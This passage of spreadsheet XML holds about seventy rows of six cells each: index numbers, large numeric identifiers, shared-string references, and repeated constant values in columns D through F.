        <v>933.0</v>
      </c>
      <c r="B15740" s="2">
        <v>2.2384603E7</v>
      </c>
      <c r="C15740" s="2" t="s">
        <v>15188</v>
      </c>
      <c r="D15740" s="2">
        <v>1.0</v>
      </c>
      <c r="E15740" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15740" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15741" ht="15.75" customHeight="1">
      <c r="A15741" s="1">
        <v>937.0</v>
      </c>
      <c r="B15741" s="2">
        <v>2.2406137E7</v>
      </c>
      <c r="C15741" s="2" t="s">
        <v>15189</v>
      </c>
      <c r="D15741" s="2">
        <v>1.0</v>
      </c>
      <c r="E15741" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15741" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15742" ht="15.75" customHeight="1">
      <c r="A15742" s="1">
        <v>1059.0</v>
      </c>
      <c r="B15742" s="2">
        <v>2.3454521E7</v>
      </c>
      <c r="C15742" s="2" t="s">
        <v>15190</v>
      </c>
      <c r="D15742" s="2">
        <v>1.0</v>
      </c>
      <c r="E15742" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15742" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15743" ht="15.75" customHeight="1">
      <c r="A15743" s="1">
        <v>1719.0</v>
      </c>
      <c r="B15743" s="2">
        <v>2.8646661E7</v>
      </c>
      <c r="C15743" s="2" t="s">
        <v>15191</v>
      </c>
      <c r="D15743" s="2">
        <v>1.0</v>
      </c>
      <c r="E15743" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15743" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15744" ht="15.75" customHeight="1">
      <c r="A15744" s="1">
        <v>1734.0</v>
      </c>
      <c r="B15744" s="2">
        <v>2.8757658E7</v>
      </c>
      <c r="C15744" s="2" t="s">
        <v>15192</v>
      </c>
      <c r="D15744" s="2">
        <v>1.0</v>
      </c>
      <c r="E15744" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15744" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15745" ht="15.75" customHeight="1">
      <c r="A15745" s="1">
        <v>2609.0</v>
      </c>
      <c r="B15745" s="2">
        <v>3.4423937E7</v>
      </c>
      <c r="C15745" s="2" t="s">
        <v>15193</v>
      </c>
      <c r="D15745" s="2">
        <v>1.0</v>
      </c>
      <c r="E15745" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15745" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15746" ht="15.75" customHeight="1">
      <c r="A15746" s="1">
        <v>2861.0</v>
      </c>
      <c r="B15746" s="2">
        <v>3.5543815E7</v>
      </c>
      <c r="C15746" s="2" t="s">
        <v>15194</v>
      </c>
      <c r="D15746" s="2">
        <v>1.0</v>
      </c>
      <c r="E15746" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15746" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15747" ht="15.75" customHeight="1">
      <c r="A15747" s="1">
        <v>3282.0</v>
      </c>
      <c r="B15747" s="2">
        <v>3.7500693E7</v>
      </c>
      <c r="C15747" s="2" t="s">
        <v>15195</v>
      </c>
      <c r="D15747" s="2">
        <v>1.0</v>
      </c>
      <c r="E15747" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15747" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15748" ht="15.75" customHeight="1">
      <c r="A15748" s="1">
        <v>3571.0</v>
      </c>
      <c r="B15748" s="2">
        <v>3.8946574E7</v>
      </c>
      <c r="C15748" s="2" t="s">
        <v>15196</v>
      </c>
      <c r="D15748" s="2">
        <v>1.0</v>
      </c>
      <c r="E15748" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15748" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15749" ht="15.75" customHeight="1">
      <c r="A15749" s="1">
        <v>4109.0</v>
      </c>
      <c r="B15749" s="2">
        <v>4.1337381E7</v>
      </c>
      <c r="C15749" s="2" t="s">
        <v>15197</v>
      </c>
      <c r="D15749" s="2">
        <v>1.0</v>
      </c>
      <c r="E15749" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15749" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15750" ht="15.75" customHeight="1">
      <c r="A15750" s="1">
        <v>4111.0</v>
      </c>
      <c r="B15750" s="2">
        <v>4.1337381E7</v>
      </c>
      <c r="C15750" s="2" t="s">
        <v>15198</v>
      </c>
      <c r="D15750" s="2">
        <v>1.0</v>
      </c>
      <c r="E15750" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15750" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15751" ht="15.75" customHeight="1">
      <c r="A15751" s="1">
        <v>4286.0</v>
      </c>
      <c r="B15751" s="2">
        <v>4.1902902E7</v>
      </c>
      <c r="C15751" s="2" t="s">
        <v>15199</v>
      </c>
      <c r="D15751" s="2">
        <v>1.0</v>
      </c>
      <c r="E15751" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15751" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15752" ht="15.75" customHeight="1">
      <c r="A15752" s="1">
        <v>4581.0</v>
      </c>
      <c r="B15752" s="2">
        <v>4.276667E7</v>
      </c>
      <c r="C15752" s="2" t="s">
        <v>15200</v>
      </c>
      <c r="D15752" s="2">
        <v>1.0</v>
      </c>
      <c r="E15752" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15752" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15753" ht="15.75" customHeight="1">
      <c r="A15753" s="1">
        <v>4937.0</v>
      </c>
      <c r="B15753" s="2">
        <v>4.4007224E7</v>
      </c>
      <c r="C15753" s="2" t="s">
        <v>15201</v>
      </c>
      <c r="D15753" s="2">
        <v>1.0</v>
      </c>
      <c r="E15753" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15753" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15754" ht="15.75" customHeight="1">
      <c r="A15754" s="1">
        <v>5089.0</v>
      </c>
      <c r="B15754" s="2">
        <v>4.4483401E7</v>
      </c>
      <c r="C15754" s="2" t="s">
        <v>15202</v>
      </c>
      <c r="D15754" s="2">
        <v>1.0</v>
      </c>
      <c r="E15754" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15754" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15755" ht="15.75" customHeight="1">
      <c r="A15755" s="1">
        <v>5177.0</v>
      </c>
      <c r="B15755" s="2">
        <v>4.4758499E7</v>
      </c>
      <c r="C15755" s="2" t="s">
        <v>15203</v>
      </c>
      <c r="D15755" s="2">
        <v>1.0</v>
      </c>
      <c r="E15755" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15755" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15756" ht="15.75" customHeight="1">
      <c r="A15756" s="1">
        <v>5821.0</v>
      </c>
      <c r="B15756" s="2">
        <v>4.6867766E7</v>
      </c>
      <c r="C15756" s="2" t="s">
        <v>15204</v>
      </c>
      <c r="D15756" s="2">
        <v>1.0</v>
      </c>
      <c r="E15756" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15756" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15757" ht="15.75" customHeight="1">
      <c r="A15757" s="1">
        <v>6088.0</v>
      </c>
      <c r="B15757" s="2">
        <v>4.7694156E7</v>
      </c>
      <c r="C15757" s="2" t="s">
        <v>15205</v>
      </c>
      <c r="D15757" s="2">
        <v>1.0</v>
      </c>
      <c r="E15757" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15757" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15758" ht="15.75" customHeight="1">
      <c r="A15758" s="1">
        <v>6460.0</v>
      </c>
      <c r="B15758" s="2">
        <v>4.8613319E7</v>
      </c>
      <c r="C15758" s="2" t="s">
        <v>15206</v>
      </c>
      <c r="D15758" s="2">
        <v>1.0</v>
      </c>
      <c r="E15758" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15758" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15759" ht="15.75" customHeight="1">
      <c r="A15759" s="1">
        <v>6507.0</v>
      </c>
      <c r="B15759" s="2">
        <v>4.8755487E7</v>
      </c>
      <c r="C15759" s="2" t="s">
        <v>15207</v>
      </c>
      <c r="D15759" s="2">
        <v>1.0</v>
      </c>
      <c r="E15759" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15759" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15760" ht="15.75" customHeight="1">
      <c r="A15760" s="1">
        <v>6800.0</v>
      </c>
      <c r="B15760" s="2">
        <v>4.9518928E7</v>
      </c>
      <c r="C15760" s="2" t="s">
        <v>15208</v>
      </c>
      <c r="D15760" s="2">
        <v>1.0</v>
      </c>
      <c r="E15760" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15760" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15761" ht="15.75" customHeight="1">
      <c r="A15761" s="1">
        <v>6920.0</v>
      </c>
      <c r="B15761" s="2">
        <v>4.9874684E7</v>
      </c>
      <c r="C15761" s="2" t="s">
        <v>15209</v>
      </c>
      <c r="D15761" s="2">
        <v>1.0</v>
      </c>
      <c r="E15761" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15761" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15762" ht="15.75" customHeight="1">
      <c r="A15762" s="1">
        <v>7575.0</v>
      </c>
      <c r="B15762" s="2">
        <v>5.1575645E7</v>
      </c>
      <c r="C15762" s="2" t="s">
        <v>15210</v>
      </c>
      <c r="D15762" s="2">
        <v>1.0</v>
      </c>
      <c r="E15762" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15762" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15763" ht="15.75" customHeight="1">
      <c r="A15763" s="1">
        <v>7669.0</v>
      </c>
      <c r="B15763" s="2">
        <v>5.1887534E7</v>
      </c>
      <c r="C15763" s="2" t="s">
        <v>15211</v>
      </c>
      <c r="D15763" s="2">
        <v>1.0</v>
      </c>
      <c r="E15763" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15763" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15764" ht="15.75" customHeight="1">
      <c r="A15764" s="1">
        <v>7763.0</v>
      </c>
      <c r="B15764" s="2">
        <v>5.2106134E7</v>
      </c>
      <c r="C15764" s="2" t="s">
        <v>15212</v>
      </c>
      <c r="D15764" s="2">
        <v>1.0</v>
      </c>
      <c r="E15764" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15764" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15765" ht="15.75" customHeight="1">
      <c r="A15765" s="1">
        <v>8163.0</v>
      </c>
      <c r="B15765" s="2">
        <v>5.3209265E7</v>
      </c>
      <c r="C15765" s="2" t="s">
        <v>15213</v>
      </c>
      <c r="D15765" s="2">
        <v>1.0</v>
      </c>
      <c r="E15765" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15765" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15766" ht="15.75" customHeight="1">
      <c r="A15766" s="1">
        <v>8551.0</v>
      </c>
      <c r="B15766" s="2">
        <v>5.4147878E7</v>
      </c>
      <c r="C15766" s="2" t="s">
        <v>15214</v>
      </c>
      <c r="D15766" s="2">
        <v>1.0</v>
      </c>
      <c r="E15766" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15766" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15767" ht="15.75" customHeight="1">
      <c r="A15767" s="1">
        <v>8552.0</v>
      </c>
      <c r="B15767" s="2">
        <v>5.4149195E7</v>
      </c>
      <c r="C15767" s="2" t="s">
        <v>15215</v>
      </c>
      <c r="D15767" s="2">
        <v>1.0</v>
      </c>
      <c r="E15767" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15767" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15768" ht="15.75" customHeight="1">
      <c r="A15768" s="1">
        <v>9160.0</v>
      </c>
      <c r="B15768" s="2">
        <v>5.5304213E7</v>
      </c>
      <c r="C15768" s="2" t="s">
        <v>15216</v>
      </c>
      <c r="D15768" s="2">
        <v>1.0</v>
      </c>
      <c r="E15768" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15768" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15769" ht="15.75" customHeight="1">
      <c r="A15769" s="1">
        <v>9313.0</v>
      </c>
      <c r="B15769" s="2">
        <v>5.5575277E7</v>
      </c>
      <c r="C15769" s="2" t="s">
        <v>15217</v>
      </c>
      <c r="D15769" s="2">
        <v>1.0</v>
      </c>
      <c r="E15769" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15769" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15770" ht="15.75" customHeight="1">
      <c r="A15770" s="1">
        <v>9332.0</v>
      </c>
      <c r="B15770" s="2">
        <v>5.5621485E7</v>
      </c>
      <c r="C15770" s="2" t="s">
        <v>15218</v>
      </c>
      <c r="D15770" s="2">
        <v>1.0</v>
      </c>
      <c r="E15770" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15770" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15771" ht="15.75" customHeight="1">
      <c r="A15771" s="1">
        <v>9739.0</v>
      </c>
      <c r="B15771" s="2">
        <v>5.6458539E7</v>
      </c>
      <c r="C15771" s="2" t="s">
        <v>15219</v>
      </c>
      <c r="D15771" s="2">
        <v>1.0</v>
      </c>
      <c r="E15771" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15771" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15772" ht="15.75" customHeight="1">
      <c r="A15772" s="1">
        <v>9917.0</v>
      </c>
      <c r="B15772" s="2">
        <v>5.680236E7</v>
      </c>
      <c r="C15772" s="2" t="s">
        <v>15220</v>
      </c>
      <c r="D15772" s="2">
        <v>1.0</v>
      </c>
      <c r="E15772" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15772" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15773" ht="15.75" customHeight="1">
      <c r="A15773" s="1">
        <v>10079.0</v>
      </c>
      <c r="B15773" s="2">
        <v>5.7148162E7</v>
      </c>
      <c r="C15773" s="2" t="s">
        <v>15221</v>
      </c>
      <c r="D15773" s="2">
        <v>1.0</v>
      </c>
      <c r="E15773" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15773" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15774" ht="15.75" customHeight="1">
      <c r="A15774" s="1">
        <v>10139.0</v>
      </c>
      <c r="B15774" s="2">
        <v>5.730543E7</v>
      </c>
      <c r="C15774" s="2" t="s">
        <v>15222</v>
      </c>
      <c r="D15774" s="2">
        <v>1.0</v>
      </c>
      <c r="E15774" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15774" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15775" ht="15.75" customHeight="1">
      <c r="A15775" s="1">
        <v>10502.0</v>
      </c>
      <c r="B15775" s="2">
        <v>1141976.0</v>
      </c>
      <c r="C15775" s="2" t="s">
        <v>15223</v>
      </c>
      <c r="D15775" s="2">
        <v>1.0</v>
      </c>
      <c r="E15775" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15775" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15776" ht="15.75" customHeight="1">
      <c r="A15776" s="1">
        <v>10510.0</v>
      </c>
      <c r="B15776" s="2">
        <v>1.1706659E7</v>
      </c>
      <c r="C15776" s="2" t="s">
        <v>15224</v>
      </c>
      <c r="D15776" s="2">
        <v>1.0</v>
      </c>
      <c r="E15776" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15776" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15777" ht="15.75" customHeight="1">
      <c r="A15777" s="1">
        <v>10869.0</v>
      </c>
      <c r="B15777" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C15777" s="2" t="s">
        <v>15225</v>
      </c>
      <c r="D15777" s="2">
        <v>1.0</v>
      </c>
      <c r="E15777" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15777" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15778" ht="15.75" customHeight="1">
      <c r="A15778" s="1">
        <v>11156.0</v>
      </c>
      <c r="B15778" s="2">
        <v>1.9456051E7</v>
      </c>
      <c r="C15778" s="2" t="s">
        <v>15226</v>
      </c>
      <c r="D15778" s="2">
        <v>1.0</v>
      </c>
      <c r="E15778" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15778" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15779" ht="15.75" customHeight="1">
      <c r="A15779" s="1">
        <v>11262.0</v>
      </c>
      <c r="B15779" s="2">
        <v>2.0661003E7</v>
      </c>
      <c r="C15779" s="2" t="s">
        <v>15227</v>
      </c>
      <c r="D15779" s="2">
        <v>1.0</v>
      </c>
      <c r="E15779" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15779" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15780" ht="15.75" customHeight="1">
      <c r="A15780" s="1">
        <v>11476.0</v>
      </c>
      <c r="B15780" s="2">
        <v>2.1967865E7</v>
      </c>
      <c r="C15780" s="2" t="s">
        <v>15228</v>
      </c>
      <c r="D15780" s="2">
        <v>1.0</v>
      </c>
      <c r="E15780" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15780" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15781" ht="15.75" customHeight="1">
      <c r="A15781" s="1">
        <v>12545.0</v>
      </c>
      <c r="B15781" s="2">
        <v>2.9828958E7</v>
      </c>
      <c r="C15781" s="2" t="s">
        <v>15229</v>
      </c>
      <c r="D15781" s="2">
        <v>1.0</v>
      </c>
      <c r="E15781" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15781" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15782" ht="15.75" customHeight="1">
      <c r="A15782" s="1">
        <v>12645.0</v>
      </c>
      <c r="B15782" s="2">
        <v>3.0373775E7</v>
      </c>
      <c r="C15782" s="2" t="s">
        <v>15230</v>
      </c>
      <c r="D15782" s="2">
        <v>1.0</v>
      </c>
      <c r="E15782" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15782" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15783" ht="15.75" customHeight="1">
      <c r="A15783" s="1">
        <v>12690.0</v>
      </c>
      <c r="B15783" s="2">
        <v>3.0710224E7</v>
      </c>
      <c r="C15783" s="2" t="s">
        <v>15231</v>
      </c>
      <c r="D15783" s="2">
        <v>1.0</v>
      </c>
      <c r="E15783" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15783" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15784" ht="15.75" customHeight="1">
      <c r="A15784" s="1">
        <v>13002.0</v>
      </c>
      <c r="B15784" s="2">
        <v>3.2812677E7</v>
      </c>
      <c r="C15784" s="2" t="s">
        <v>15232</v>
      </c>
      <c r="D15784" s="2">
        <v>1.0</v>
      </c>
      <c r="E15784" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15784" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15785" ht="15.75" customHeight="1">
      <c r="A15785" s="1">
        <v>13115.0</v>
      </c>
      <c r="B15785" s="2">
        <v>3.3582362E7</v>
      </c>
      <c r="C15785" s="2" t="s">
        <v>15233</v>
      </c>
      <c r="D15785" s="2">
        <v>1.0</v>
      </c>
      <c r="E15785" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15785" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15786" ht="15.75" customHeight="1">
      <c r="A15786" s="1">
        <v>13199.0</v>
      </c>
      <c r="B15786" s="2">
        <v>3.4129039E7</v>
      </c>
      <c r="C15786" s="2" t="s">
        <v>15234</v>
      </c>
      <c r="D15786" s="2">
        <v>1.0</v>
      </c>
      <c r="E15786" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15786" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15787" ht="15.75" customHeight="1">
      <c r="A15787" s="1">
        <v>13373.0</v>
      </c>
      <c r="B15787" s="2">
        <v>3.4855006E7</v>
      </c>
      <c r="C15787" s="2" t="s">
        <v>15235</v>
      </c>
      <c r="D15787" s="2">
        <v>1.0</v>
      </c>
      <c r="E15787" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15787" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15788" ht="15.75" customHeight="1">
      <c r="A15788" s="1">
        <v>13909.0</v>
      </c>
      <c r="B15788" s="2">
        <v>3.7094364E7</v>
      </c>
      <c r="C15788" s="2" t="s">
        <v>15236</v>
      </c>
      <c r="D15788" s="2">
        <v>1.0</v>
      </c>
      <c r="E15788" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15788" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15789" ht="15.75" customHeight="1">
      <c r="A15789" s="1">
        <v>15031.0</v>
      </c>
      <c r="B15789" s="2">
        <v>4.1555772E7</v>
      </c>
      <c r="C15789" s="2" t="s">
        <v>15237</v>
      </c>
      <c r="D15789" s="2">
        <v>1.0</v>
      </c>
      <c r="E15789" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15789" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15790" ht="15.75" customHeight="1">
      <c r="A15790" s="1">
        <v>15096.0</v>
      </c>
      <c r="B15790" s="2">
        <v>4.1792136E7</v>
      </c>
      <c r="C15790" s="2" t="s">
        <v>15238</v>
      </c>
      <c r="D15790" s="2">
        <v>1.0</v>
      </c>
      <c r="E15790" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15790" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15791" ht="15.75" customHeight="1">
      <c r="A15791" s="1">
        <v>15116.0</v>
      </c>
      <c r="B15791" s="2">
        <v>4.1880091E7</v>
      </c>
      <c r="C15791" s="2" t="s">
        <v>15239</v>
      </c>
      <c r="D15791" s="2">
        <v>1.0</v>
      </c>
      <c r="E15791" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15791" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15792" ht="15.75" customHeight="1">
      <c r="A15792" s="1">
        <v>15230.0</v>
      </c>
      <c r="B15792" s="2">
        <v>4.2198222E7</v>
      </c>
      <c r="C15792" s="2" t="s">
        <v>15240</v>
      </c>
      <c r="D15792" s="2">
        <v>1.0</v>
      </c>
      <c r="E15792" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15792" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15793" ht="15.75" customHeight="1">
      <c r="A15793" s="1">
        <v>15726.0</v>
      </c>
      <c r="B15793" s="2">
        <v>4.4015816E7</v>
      </c>
      <c r="C15793" s="2" t="s">
        <v>15241</v>
      </c>
      <c r="D15793" s="2">
        <v>1.0</v>
      </c>
      <c r="E15793" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15793" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15794" ht="15.75" customHeight="1">
      <c r="A15794" s="1">
        <v>16377.0</v>
      </c>
      <c r="B15794" s="2">
        <v>4.6187655E7</v>
      </c>
      <c r="C15794" s="2" t="s">
        <v>15242</v>
      </c>
      <c r="D15794" s="2">
        <v>1.0</v>
      </c>
      <c r="E15794" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15794" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15795" ht="15.75" customHeight="1">
      <c r="A15795" s="1">
        <v>16826.0</v>
      </c>
      <c r="B15795" s="2">
        <v>4.7873052E7</v>
      </c>
      <c r="C15795" s="2" t="s">
        <v>15243</v>
      </c>
      <c r="D15795" s="2">
        <v>1.0</v>
      </c>
      <c r="E15795" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15795" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15796" ht="15.75" customHeight="1">
      <c r="A15796" s="1">
        <v>17075.0</v>
      </c>
      <c r="B15796" s="2">
        <v>4.8593225E7</v>
      </c>
      <c r="C15796" s="2" t="s">
        <v>15244</v>
      </c>
      <c r="D15796" s="2">
        <v>1.0</v>
      </c>
      <c r="E15796" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15796" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15797" ht="15.75" customHeight="1">
      <c r="A15797" s="1">
        <v>17401.0</v>
      </c>
      <c r="B15797" s="2">
        <v>4.9635362E7</v>
      </c>
      <c r="C15797" s="2" t="s">
        <v>15245</v>
      </c>
      <c r="D15797" s="2">
        <v>1.0</v>
      </c>
      <c r="E15797" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15797" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15798" ht="15.75" customHeight="1">
      <c r="A15798" s="1">
        <v>17487.0</v>
      </c>
      <c r="B15798" s="2">
        <v>4.9952696E7</v>
      </c>
      <c r="C15798" s="2" t="s">
        <v>15246</v>
      </c>
      <c r="D15798" s="2">
        <v>1.0</v>
      </c>
      <c r="E15798" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15798" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15799" ht="15.75" customHeight="1">
      <c r="A15799" s="1">
        <v>17943.0</v>
      </c>
      <c r="B15799" s="2">
        <v>5.1249805E7</v>
      </c>
      <c r="C15799" s="2" t="s">
        <v>15247</v>
      </c>
      <c r="D15799" s="2">
        <v>1.0</v>
      </c>
      <c r="E15799" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15799" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15800" ht="15.75" customHeight="1">
      <c r="A15800" s="1">
        <v>18029.0</v>
      </c>
      <c r="B15800" s="2">
        <v>5.1533205E7</v>
      </c>
      <c r="C15800" s="2" t="s">
        <v>15248</v>
      </c>
      <c r="D15800" s="2">
        <v>1.0</v>
      </c>
      <c r="E15800" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15800" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15801" ht="15.75" customHeight="1">
      <c r="A15801" s="1">
        <v>18427.0</v>
      </c>
      <c r="B15801" s="2">
        <v>5.2716174E7</v>
      </c>
      <c r="C15801" s="2" t="s">
        <v>15249</v>
      </c>
      <c r="D15801" s="2">
        <v>1.0</v>
      </c>
      <c r="E15801" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15801" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15802" ht="15.75" customHeight="1">
      <c r="A15802" s="1">
        <v>18886.0</v>
      </c>
      <c r="B15802" s="2">
        <v>5.4119375E7</v>
      </c>
      <c r="C15802" s="2" t="s">
        <v>15250</v>
      </c>
      <c r="D15802" s="2">
        <v>1.0</v>
      </c>
      <c r="E15802" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15802" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15803" ht="15.75" customHeight="1">
      <c r="A15803" s="1">
        <v>19262.0</v>
      </c>
      <c r="B15803" s="2">
        <v>5.5128777E7</v>
      </c>
      <c r="C15803" s="2" t="s">
        <v>15251</v>
      </c>
      <c r="D15803" s="2">
        <v>1.0</v>
      </c>
      <c r="E15803" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15803" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15804" ht="15.75" customHeight="1">
      <c r="A15804" s="1">
        <v>19399.0</v>
      </c>
      <c r="B15804" s="2">
        <v>5.5578897E7</v>
      </c>
      <c r="C15804" s="2" t="s">
        <v>15252</v>
      </c>
      <c r="D15804" s="2">
        <v>1.0</v>
      </c>
      <c r="E15804" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15804" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15805" ht="15.75" customHeight="1">
      <c r="A15805" s="1">
        <v>19441.0</v>
      </c>
      <c r="B15805" s="2">
        <v>5.5717081E7</v>
      </c>
      <c r="C15805" s="2" t="s">
        <v>15253</v>
      </c>
      <c r="D15805" s="2">
        <v>1.0</v>
      </c>
      <c r="E15805" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15805" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15806" ht="15.75" customHeight="1">
      <c r="A15806" s="1">
        <v>19621.0</v>
      </c>
      <c r="B15806" s="2">
        <v>5.6246491E7</v>
      </c>
      <c r="C15806" s="2" t="s">
        <v>15254</v>
      </c>
      <c r="D15806" s="2">
        <v>1.0</v>
      </c>
      <c r="E15806" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15806" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15807" ht="15.75" customHeight="1">
